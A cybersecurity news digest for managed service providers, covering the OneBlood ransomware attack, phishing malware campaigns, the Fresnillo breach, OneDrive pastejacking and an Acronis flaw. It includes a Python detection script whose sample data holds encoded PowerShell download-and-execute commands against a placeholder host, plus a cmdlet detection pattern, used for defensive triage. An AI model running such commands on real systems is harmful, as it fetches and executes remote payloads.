MSP cybersecurity news digest, August 5, 2024

OneBlood hit by ransomware attack, causing severe blood shortages in hundreds of hospitals

A ransomware attack has severely disrupted operations at OneBlood, one of the largest U.S. blood centers, affecting its ability to serve health care facilities across the Southeast. OneBlood has 2,700 employees, and its revenue in 2023 was $168.3 million.

This cyberattack has forced OneBlood to implement manual processes, significantly slowing down their operations and affecting blood inventory. In response, over 250 hospitals have activated critical blood shortage protocols to manage the supply.

OneBlood is collaborating with cybersecurity experts and authorities to resolve the issue while continuing to collect, test and distribute blood at reduced capacity.

Phishing campaign targets Polish businesses with Agent Tesla, Remcos RAT and other malware families

Researchers have detailed widespread phishing campaigns targeting small and medium-sized businesses (SMBs) in Poland during May 2024, leading to the deployment of malware families such as Agent Tesla, Formbook and Remcos RAT. The campaigns later extended to Italy and Romania.

Attackers used compromised email accounts and company servers to send malicious emails, host malware and collect stolen data. The campaigns featured a malware loader called DBatLoader, marking a shift from the cryptor-as-a-service (CaaS) AceCryptor used in the second half of 2023.

The attacks began with phishing emails containing weaponized RAR or ISO attachments that, when opened, triggered a process to download and execute a trojan. The ISO files led to the execution of DBatLoader, while the RAR archives contained an obfuscated script to launch ModiLoader, ultimately deploying malware like Agent Tesla, Formbook and Remcos RAT to steal sensitive information.

Prominent silver producer Fresnillo discloses they were struck by a cyberattack

Fresnillo PLC, the world’s largest silver producer with a revenue of $2.7 billion in 2023, reported a recent cyberattack that led to unauthorized access to its data.

In a filing with the London Stock Exchange, the company stated that its operations were unaffected and no financial or material impact was expected. Fresnillo initiated response measures and is investigating the breach with the help of external forensic experts.

Fresnillo operates several mines in Mexico and is listed on both the London and Mexican stock exchanges.

OneDrive users warned about phishing campaign deploying a malicious PowerShell script

Researchers are alerting Microsoft OneDrive users to a new phishing campaign that deploys a malicious PowerShell script. The campaign uses social engineering to trick users into executing the script themselves, thereby compromising their own systems.

The attack, dubbed OneDrive Pastejacking, begins with an email containing an HTML file that mimics a OneDrive error page. Users are misled into opening a PowerShell terminal and pasting a Base64-encoded command, which then downloads and executes malicious files.

This campaign has targeted users in the U.S., South Korea, Germany, India and several other countries. The technique is part of a broader trend of phishing attacks that leverage deceptive emails and legitimate-looking forms to steal credentials and deploy malware.
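The defensive signal in the pastejacking chain described above is a PowerShell process or script block carrying a Base64-encoded command that decodes to download-and-execute logic. The following triage script is an added example, not code from the original digest or from the researchers cited; it runs over constructed process-creation records (the hosts, parent processes and encoded payloads are made up for the sample), decodes any `-EncodedCommand` argument the way PowerShell does (Base64 of UTF-16LE text) and rates each record by what the decoded script contains.

```python
import base64
import re

# Constructed sample records in the shape of process-creation telemetry
# (e.g. Windows Security 4688 or Sysmon Event ID 1). Not real logs.
def _encode(ps: str) -> str:
    # PowerShell's -EncodedCommand takes Base64 of the UTF-16LE script text.
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"host": "WS01", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand " + _encode("Get-ChildItem C:\\Users")},
    {"host": "WS02", "parent": "explorer.exe",
     "cmdline": "powershell.exe -w hidden -e "
                + _encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')")},
    {"host": "WS03", "parent": "winword.exe",
     "cmdline": "powershell.exe -EncodedCommand "
                + _encode("Invoke-WebRequest http://example.invalid/a -OutFile $env:TEMP\\a.exe; "
                          "Start-Process $env:TEMP\\a.exe")},
    {"host": "WS04", "parent": "cmd.exe", "cmdline": "powershell.exe -Command Get-Date"},
]

# PowerShell accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...);
# the lookahead keeps -ExecutionPolicy from matching.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?!executionpolicy\b)e[a-z]*\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# Cmdlets and methods that fetch content from the network or run what was fetched.
DOWNLOAD_EXEC = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b"
    r"|Start-Process|FromBase64String", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded script text of an -EncodedCommand argument, or None."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Not valid Base64/UTF-16LE: still worth a look, but nothing to decode.
        return None


def rate_event(event: dict):
    """Return (severity, reasons) for one record, or (None, []) if nothing stands out."""
    reasons = []
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        reasons.append("encoded command decodes to: " + decoded)
        if DOWNLOAD_EXEC.search(decoded):
            reasons.append("decoded script downloads and/or executes content")
            return "high", reasons
        return "low", reasons
    if DOWNLOAD_EXEC.search(event["cmdline"]):
        reasons.append("plain command line downloads and/or executes content")
        return "medium", reasons
    return None, reasons


def triage(events):
    """Map host -> severity for every record that produced a finding."""
    result = {}
    for event in events:
        severity, _ = rate_event(event)
        if severity is not None:
            result[event["host"]] = severity
    return result


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        severity, reasons = rate_event(event)
        if severity:
            print(f"{event['host']} [{severity}] parent={event['parent']}")
            for reason in reasons:
                print("   -", reason)
```

Encoded commands alone are common in legitimate administration, so the script rates them low and escalates only when the decoded text fetches or runs remote content; in a real deployment the same logic would also run over Script Block Logging (Event ID 4104), which captures what a user pastes into an already-open terminal. Disabling or constraining interactive PowerShell for ordinary users and enabling Script Block Logging are the corresponding preventive and detective controls.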

Acronis warns clients to patch security flaw in Cyber Infrastructure that enables default credential abuse

Acronis has alerted customers to patch a critical security flaw in Cyber Infrastructure that allows attackers to bypass authentication using default credentials.

The flaw, tracked as CVE-2023-45249, enables remote code execution on unpatched servers without user interaction. Acronis Cyber Infrastructure (ACI) is a multitenant platform for cyber protection, integrating remote endpoint management, backup and virtualization.

The vulnerability was patched nine months ago and affects ACI builds that predate the fixed releases. Customers are advised to check their ACI build number and update to the latest version. Acronis Cyber Protect Cloud, Acronis Cyber Protect and Acronis True Image customers are not affected by the vulnerability.